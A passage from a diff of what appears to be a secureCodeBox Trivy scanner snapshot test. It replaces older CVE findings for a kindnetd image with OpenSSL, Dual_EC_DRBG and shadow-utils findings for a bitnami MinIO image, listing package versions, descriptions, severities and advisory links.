policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ElGamal implementation allows plaintext recovery", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-40528", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5311", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-40528", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2002816", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5311", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", - ], - }, - "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-43618", - "installedVersion": "2:6.1.2+dfsg-4", - "packageName": "libgmp10", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/8", - "http://www.openwall.com/lists/oss-security/2022/10/13/3", - "https://access.redhat.com/security/cve/CVE-2021-43618", - "https://bugs.debian.org/994405", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", - "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", - "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", - "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", - "https://security.netapp.com/advisory/ntap-20221111-0001/", - "https://ubuntu.com/security/notices/USN-5672-1", - "https://ubuntu.com/security/notices/USN-5672-2", - "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Integer overflow and resultant buffer overflow via crafted input", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43618", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/8", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43618", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://bugs.debian.org/994405", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20231", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20231", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20231.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20231", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnutls: Use after free in client key_share extension", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20231", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20231", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20232", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20232", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20232.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20232", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + 